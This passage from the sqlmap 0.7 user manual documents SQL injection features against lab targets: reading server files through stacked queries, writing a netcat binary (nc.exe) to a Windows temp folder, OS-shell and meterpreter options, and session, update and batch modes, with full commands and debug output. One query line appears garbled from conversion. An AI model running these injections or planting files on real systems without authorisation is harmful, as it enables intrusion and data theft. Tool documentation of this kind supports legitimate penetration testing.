As you can see from this last example, when the user provides a SQL statement other than SELECT, sqlmap recognizes it, tests if the web application supports stacked queries and in case it does, it executes the provided SQL statement in a multiple statement.

Beware that some web application technologies do not support stacked queries on specific database management systems. For instance, PHP does not support stacked queries when the back-end DBMS is MySQL, but it does support when the back-end DBMS is PostgreSQL.

5.8 File system access

5.8.1 Read a file from the back-end DBMS file system

```
Option: -read-file
```

It is possible to retrieve the content of files from the underlying file system when the back-end database management is system is either MySQL, PostgreSQL or Microsoft SQL Server. The file specified can be either a text or a binary file, sqlmap will handle either cases automatically.

The techniques implemented are detailed on the white paper Advanced SQL injection to operating system full control.

Example on a PostgreSQL 8.3.5 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --read-file \
  "C:\example.txt" -v2
[...]
[hh:mm:53] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Windows 2003 or 2008
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: PostgreSQL
[hh:mm:53] [INFO] testing stacked queries support on parameter 'id'
[hh:mm:53] [INFO] detecting back-end DBMS version from its banner
[hh:mm:53] [DEBUG] query: COALESCE(CAST(SUBSTR((VERSION())::text, 12, 6) AS CHARACTER(10000)),
CHR(32))
[hh:mm:53] [INFO] retrieved: 8.3.5,
[hh:mm:58] [DEBUG] performed 49 queries in 4 seconds
[hh:mm:58] [DEBUG] query: SELECT PG_SLEEP(5)
[hh:mm:03] [INFO] the web application supports stacked queries on parameter 'id'
[hh:mm:03] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:03] [DEBUG] query: DROP TABLE sqlmapfile
[hh:mm:03] [DEBUG] query: CREATE TABLE sqlmapfile(data character(500))
[hh:mm:03] [DEBUG] query: INSERT INTO sqlmapfile(data) VALUES (VERSION())
[hh:mm:03] [DEBUG] query: SELECT (CASE WHEN ((SELECT LENGTH(data) FROM sqlmapfile WHERE data
LIKE CHR(37)||CHR(32)||CHR(86)||CHR(105)||CHR(115)||CHR(117)||CHR(97)||CHR(108)||CHR(32)||
CHR(67)||CHR(43)||CHR(43)||CHR(37))>0) THEN 1 ELSE 0 END)
[hh:mm:03] [INFO] retrieved: 1
[hh:mm:03] [DEBUG] performed 5 queries in 0 seconds
[hh:mm:03] [INFO] the back-end DBMS operating system is Windows
```

```
[hh:mm:03] [DEBUG] cleaning up the database management system
[hh:mm:03] [DEBUG] removing support tables
[hh:mm:04] [DEBUG] query: DROP TABLE sqlmapfile
[hh:mm:04] [DEBUG] going to read the file with stacked query SQL injection technique
[hh:mm:04] [WARNING] binary file read on PostgreSQL is not yet supported, if the requested file
is binary, its content will not be retrieved
[hh:mm:04] [INFO] fetching file: 'C:/example.txt'
[hh:mm:04] [DEBUG] query: DROP TABLE sqlmapfile
[hh:mm:04] [DEBUG] query: CREATE TABLE sqlmapfile(data bytea)
[hh:mm:04] [DEBUG] loading the content of file 'C:/example.txt' into support table
[hh:mm:04] [DEBUG] query: COPY sqlmapfile(data) FROM 'C:/example.txt'
[hh:mm:04] [DEBUG] query: SELECT COALESCE(CAST(COUNT(data) AS CHARACTER(10000)), CHR(32)) FROM
sqlmapfile
[hh:mm:04] [INFO] retrieved: 1
[hh:mm:04] [DEBUG] performed 6 queries in 0 seconds
[hh:mm:04] \quad [DEBUG] \quad query: \quad SELECT \quad COALESCE(CAST(ENCODE(data, CHR(98)||CHR(97)||CHR(115)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)||CHR(101)
||CHR(54)||CHR(52)) AS CHARACTER(10000)), CHR(32)) FROM sqlmapfile OFFSET 0 LIMIT 1
[hh:mm:04] [INFO] retrieved: VGhpcyBpcyBhIHRleHQgZmlsZQ==
[hh:mm:22] [DEBUG] performed 203 queries in 18 seconds
[hh:mm:22] [DEBUG] cleaning up the database management system
[hh:mm:22] [DEBUG] removing support tables
[hh:mm:22] [DEBUG] query: DROP TABLE sqlmapfile
C:/example.txt file saved to:
                                                                          '/home/inquis/sqlmap/output/192.168.1.121/files/C__example.txt'
[hh:mm:22] [INFO] Fetched data logged to text files under '/home/inquis/sqlmap/output/192.168.1.121'
$ cat output/192.168.1.121/files/C__example.txt
This is a text file
```

5.8.2 Write a local file on the back-end DBMS file system

Options: -write-file and -dest-file

It is possible to upload a local file to the underlying file system when the back-end database management is system is either MySQL, PostgreSQL or Microsoft SQL Server. The file specified can be either a text or a binary file, sqlmap will handle either cases automatically.

The techniques implemented are detailed on the white paper Advanced SQL injection to operating system full control .

Example on a MySQL 5.0.67 target:

```
[01:12:36] [INFO] retrieved: C
[01:12:36] [INFO] the back-end DBMS operating system is Windows
do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been successfully
written on the back-end DBMS file system? [Y/n] y
[01:12:52] [INFO] retrieved: 31744
[01:12:52] [INFO] the file has been successfully written and its size is 31744 bytes, same
size as the local file '/home/inquis/software/netcat/nc.exe.packed'
```

5.9 Operating system access

5.9.1 Execute an operating system command

Option: -os-cmd

TODO

The techniques implemented are detailed on the white paper Advanced SQL injection to operating system full control .

5.9.2 Prompt for an interactive operating system shell

Option: -os-shell

TODO

The techniques implemented are detailed on the white paper Advanced SQL injection to operating system full control.

5.9.3 Prompt for an out-of-band shell, meterpreter or VNC

Options: -os-pwn, -priv-esc, -msf-path and -tmp-path

TODU

The techniques implemented are detailed on the white paper Advanced SQL injection to operating system full control .

5.9.4 One click prompt for an out-of-band shell, meterpreter or VNC

Options: -os-smbrelay, -priv-esc and -msf-path

TODO

The techniques implemented are detailed on the white paper Advanced SQL injection to operating system full control .

5.9.5 Stored procedure buffer overflow exploitation

Options: -os-bof, -priv-esc and -msf-path

TODO

The techniques implemented are detailed on the white paper Advanced SQL injection to operating system full control .

Miscellaneous 5.10

5.10.1Estimated time of arrival

```
Option: -eta
```

It is possible to calculate and show the estimated time of arrival to retrieve each query output in real time while performing the SQL injection attack.

Example on an Oracle XE 10.2.0.1 target:

```
python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" -b \
      --eta -v 1
     Γ...
    back-end DBMS: Oracle
     [hh:mm:24] [INFO] fetching banner
     [hh:mm:24] [INFO] the resumed output is partial, sqlmap is going to retrieve the query
     output again
     [hh:mm:24] [INFO] retrieved the length of query output: 64
     [hh:mm:24] [INFO] query: SELECT NVL(CAST(banner AS VARCHAR(4000)), (CHR(32))) FROM v$version
    WHERE ROWNUM=1
    ] 49/64 ETA 00:00
then:
    100% [=========] 64/64
     [hh:mm:15] [INFO] performed 454 queries in 2 seconds
              'Oracle Database 10g Express Edition Release 10.2.0.1.0 - Product'
Example on a Microsoft SQL Server 2000 Service Pack 0 target:
    $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" \
      --users --eta -v 1
```

```
Γ...1
back-end DBMS: Microsoft SQL Server 2000
[hh:mm:57] [INFO] fetching database users
[hh:mm:57] [INFO] fetching number of database users
[hh:mm:57] [INFO] query: SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)),
(CHAR(32))) FROM master..syslogins
[hh:mm:57] [INFO] retrieved: 3
[hh:mm:57] [INFO] performed 13 queries in 0 seconds
[hh:mm:57] [INFO] retrieved the length of query output: 22
[hh:mm:57] [INFO] query: SELECT TOP 1 ISNULL(CAST(name AS VARCHAR(8000)), (CHAR(32))) FROM
master..syslogins WHERE name NOT IN (SELECT TOP O name FROM master..syslogins ORDER BY name)
ORDER BY name
100% [=========] 22/22
[hh:mm:58] [INFO] performed 160 queries in 0 seconds
[hh:mm:58] [INFO] retrieved the length of query output: 2
[hh:mm:58] [INFO] query: SELECT TOP 1 ISNULL(CAST(name AS VARCHAR(8000)), (CHAR(32))) FROM
master..syslogins WHERE name NOT IN (SELECT TOP 1 name FROM master..syslogins ORDER BY name)
ORDER BY name
```

As you can see, sqlmap first calculates the length of the query output, then estimated the time of arrival, shows the progress in percentage and counts the number of retrieved query output characters.

5.10.2 Update sqlmap to the latest stable version

Option: -update

It is possible to update sqlmap to the latest stable version available on its SourceForge File List page by running it with the -update option.

```
$ python sqlmap.py --update -v 4
[hh:mm:53] [DEBUG] initializing the configuration
[hh:mm:53] [DEBUG] initializing the knowledge base
[hh:mm:53] \ [DEBUG] \ cleaning \ up \ configuration \ parameters
[hh:mm:53] [DEBUG] setting the HTTP method to perform HTTP requests through
[hh:mm:53] [DEBUG] creating HTTP requests opener object
[hh:mm:53] [INFO] updating sqlmap
[hh:mm:53] [DEBUG] checking if a new version is available
[hh:mm:55] [TRAFFIC OUT] HTTP request:
GET /doc/VERSION HTTP/1.1
Host: sqlmap.sourceforge.net
User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:55] [TRAFFIC IN] HTTP response (OK - 200):
Date: Fri, 01 Aug 2008 14:50:55 GMT
Server: Apache/1.3.33 (Unix) PHP/4.3.10
Last-Modified: Thu, 31 Jul 2008 11:10:19 GMT
ETag: "9fcc53e-4-48919d9b"
Accept-Ranges: bytes
Content-Length: 4
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug
[hh:mm:55] [INFO] you are already running sqlmap latest stable version
[hh:mm:55] [INFO] updating Microsoft SQL Server XML versions file
[hh:mm:56] [TRAFFIC OUT] HTTP request:
GET /FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx HTTP/1.1
Host: www.sqlsecurity.com
```

```
User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
Cookie: .ASPXANONYMOUS=dvusO3cqyQEkAAAANDIOM2QzZmUtOGRkOSOOZDQxLThhMTUtN2ExMWJiNWVjN2MyO;
language=en-US
Connection: close
[hh:mm:02] [TRAFFIC IN] HTTP response (OK - 200):
Cache-Control: private
Connection: close
Date: Fri, 01 Aug 2008 14:50:50 GMT
Content-Length: 167918
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=dvusO3cqyQEkAAAANDIOM2QzZmUtOGRkOSOOZDQxLThhMTUtN2ExMWJiNWVjN2MyO;
expires=Fri, 10-Oct-2008 01:30:49 GMT; path=/; HttpOnly
Set-Cookie: language=en-US; path=/; HttpOnly
[hh:mm:02] [INFO] no new Microsoft SQL Server versions since the last update
[hh:mm:02] [DEBUG] parsing XML queries file
```

As you can see, sqlmap first check if a new stable version is available, then in case it is, download it, unzip it and update the Microsoft SQL Server XML versions file from Chip Andrews' SQLSecurity.com site.

Note that the default configuration file sqlmap.conf is backupped to sqlmap.conf.bak in case a new stable version is available and your copy is updated.

5.10.3 Save and resume all data retrieved on a session file

Option: -s

It is possible to log all queries and their output on a text file while performing whatever request, both in blind SQL injection and in inband SQL injection. This is useful if you stop the injection and resume it after some time.

Example on a PostgreSQL 8.3.5 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -b \
    -v 1 -s "sqlmap.log"

[...]
back-end DBMS: PostgreSQL
[hh:mm:02] [INFO] query: VERSION()
[hh:mm:02] [INFO] retrieved: PostgreSQL 8.3.5 on i486-pc-^C
[hh:mm:03] [ERROR] user aborted
```

As you can see, I stopped the injection with CTRL-C while retrieving the PostgreSQL banner and logged the session to text file sqlmap.log.

```
$ cat sqlmap.log
[hh:mm:00 MM/DD/YY]
[http://192.168.1.121:80/sqlmap/pgsql/get_int.php][GET][id=1][Injection point][GET]
[http://192.168.1.121:80/sqlmap/pgsql/get_int.php][GET][id=1][Injection parameter][id]
[http://192.168.1.121:80/sqlmap/pgsql/get_int.php][GET][id=1][Injection type][numeric]
```

```
[http://192.168.1.121:80/sqlmap/pgsql/get_int.php] [GET] [id=1] [Parenthesis] [0] [http://192.168.1.121:80/sqlmap/pgsql/get_int.php] [GET] [id=1] [CONCAT('9', '9')] [] [http://192.168.1.121:80/sqlmap/pgsql/get_int.php] [GET] [id=1] [LENGTH(SYSDATE)] [] [http://192.168.1.121:80/sqlmap/pgsql/get_int.php] [GET] [id=1] [COALESCE(3, NULL)] [3] [http://192.168.1.121:80/sqlmap/pgsql/get_int.php] [GET] [id=1] [LENGTH('3')] [1] [http://192.168.1.121:80/sqlmap/pgsql/get_int.php] [GET] [id=1] [DBMS] [PostgreSQL] [http://192.168.1.121:80/sqlmap/pgsql/get_int.php] [GET] [id=1] [VERSION()] [PostgreSQL 8.3.5 on i486-pc-
```

As you can see, all queries performed and their output have been logged to the session file in real time while performing the injection.

The session file has a structure as follows:

```
[hh:mm:ss MM/DD/YY]
[Target URL][Injection point][Parameters][Query or information name][Query output or value]
```

Performing the same request now, sqlmap resumes all information already retrieved then calculates the query length, in the example VERSION(), and resumes the injection from the last character retrieved to the end of the query output.

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -b \
  -v 1 -s "sqlmap.log"
[...]
[hh:mm:03] [INFO] resuming injection point 'GET' from session file
[hh:mm:03] [INFO] resuming injection parameter 'id' from session file
[hh:mm:03] [INFO] resuming injection type 'numeric' from session file
[hh:mm:03] [INFO] resuming O number of parenthesis from session file
[hh:mm:03] [INFO] resuming back-end DBMS 'PostgreSQL' from session file
[hh:mm:03] [INFO] testing connection to the target url
[hh:mm:03] [INFO] testing for parenthesis on injectable parameter
[hh:mm:03] [INFO] retrieving the length of query output
[hh:mm:03] [INFO] query: LENGTH(VERSION())
[hh:mm:03] [INFO] retrieved: 98
[hh:mm:03] [INFO] resumed from file 'sqlmap.log': PostgreSQL 8.3.5 on i486-pc-...
[hh:mm:03] [INFO] retrieving pending 70 query output characters
[hh:mm:03] [INFO] query: SUBSTR((VERSION())::text, 29, 98)
[hh:mm:03] [INFO] retrieved: linux-gnu, compiled by GCC gcc-4.3.real
(Ubuntu 4.3.2-1ubuntu11) 4.3.2
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
back-end DBMS: PostgreSQL
[hh:mm:07] [INFO] fetching banner
           'PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real
banner:
(Ubuntu 4.3.2-1ubuntu11) 4.3.2'
```

5.10.4 Save options on a configuration INI file

Option: -save

It is possible to save the command line options to a configuration INI file.

Example on a $\mathbf{PostgreSQL}$ 8.3.5 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -b \
    -v 1 --save

[hh:mm:33] [INFO] saved command line options on '/software/sqlmap/sqlmap-SAUbs.conf'
configuration file
[hh:mm:33] [INFO] testing connection to the target url
[hh:mm:33] [INFO] testing if the url is stable, wait a few seconds
[...]
```

As you can see, sqlmap saved the command line options to a configuration INI file, sqlmap-SAUbs.conf.

```
$ cat sqlmap-SAUbs.conf
[Target]
url = http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1
googledork =
list =
[Request]
threads = 1
useragentsfile =
atype =
agent =
delay = 0
headers =
cookie =
proxy =
timeout = 30
acred =
referer =
data =
method = GET
[Miscellaneous]
updateall = False
sessionfile =
eta = False
batch = False
cleanup = False
verbose = 1
[Enumeration]
dumpall = False
limitstop = 0
getusers = False
isdba = False
getpasswordhashes = False
excludesysdbs = False
getcurrentdb = False
gettables = False
dumptable = False
db =
limitstart = 0
getprivileges = False
sqlshell = False
tbl =
```

```
getcolumns = False
query =
getdbs = False
user =
col =
getcurrentuser = False
getbanner = True
[File system]
dfile =
wfile =
rfile =
[Takeover]
msfpath =
osshell = False
ossmb = False
privesc = False
ospwn = False
tmppath =
oscmd =
osbof = False
[Fingerprint]
extensivefp = False
[Injection]
dbms =
string =
postfix =
regexp =
prefix =
testparameter =
estring =
eregexp =
os =
[Techniques]
stackedtest = False
utech =
unionuse = False
timetest = False
uniontest = False
```

The file is a valid sqlmap configuration INI file. You can edit the configuration options as you wish and pass it to sqlmap with the -c option as explained above in section 5.2:

```
$ python sqlmap.py -c "sqlmap-SAUbs.conf"
[...]
[hh:mm:16] [INFO] performed 657 queries in 6 seconds
banner: 'PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real
(Ubuntu 4.3.2-1ubuntu11) 4.3.2'
```

6. Disclaimer 68

5.10.5 Act in non-interactive mode

Option: -batch

If you want sqlmap to run as a batch tool, without interacting with you in case of a choice has to be done, you can force it by using -batch option than letting sqlmap go for a default behaviour.

Example on a MySQL 5.0.67 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_str.php?id=1&name=luther" \
  --batch -v 1
[hh:mm:22] [INFO] testing if GET parameter 'id' is dynamic
[hh:mm:22] [INFO] confirming that GET parameter 'id' is dynamic
[hh:mm:22] [INFO] GET parameter 'id' is dynamic
[hh:mm:22] [INFO] testing sql injection on GET parameter 'id' with O parenthesis
[hh:mm:22] [INFO] testing unescaped numeric injection on GET parameter 'id'
[hh:mm:22] [INFO] confirming unescaped numeric injection on GET parameter 'id'
[hh:mm:22] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
[hh:mm:22] [INFO] testing if GET parameter 'name' is dynamic
[hh:mm:22] [INFO] confirming that GET parameter 'name' is dynamic
[hh:mm:22] [INFO] GET parameter 'name' is dynamic
[hh:mm:22] [INFO] testing sql injection on GET parameter 'name' with 0 parenthesis
[hh:mm:22] [INFO] testing unescaped numeric injection on GET parameter 'name'
[hh:mm:22] [INFO] GET parameter 'name' is not unescaped numeric injectable
[hh:mm:22] [INFO] testing single quoted string injection on GET parameter 'name'
[hh:mm:22] [INFO] confirming single quoted string injection on GET parameter 'name'
[hh:mm:22] [INFO] GET parameter 'name' is single quoted string injectable with 0 parenthesis
[hh:mm:22] [INFO] there were multiple injection points, please select the one to use to go
[0] place: GET, parameter: id, type: numeric (default)
[1] place: GET, parameter: name, type: stringsingle
[q] Quit
Choice: 0
[hh:mm:22] [DEBUG] used the default behaviour, running in batch mode
[...]
back-end DBMS: MySQL >= 5.0.0
```

As you can see, sqlmap choosed automatically to injection on the first vulnerable parameter which is the default behaviour.

5.10.6 Clean up the DBMS by sqlmap specific UDF and tables

Option: -cleanup

This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper Advanced SQL injection to operating system full control for the moment.

6 Disclaimer

sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

7. Author 69

Whatever you do with this tool is uniquely your responsability. If you are not authorized to punch holes in the network you are attacking be aware that such action might get you in trouble with a lot of law enforcement agencies.

7 Author

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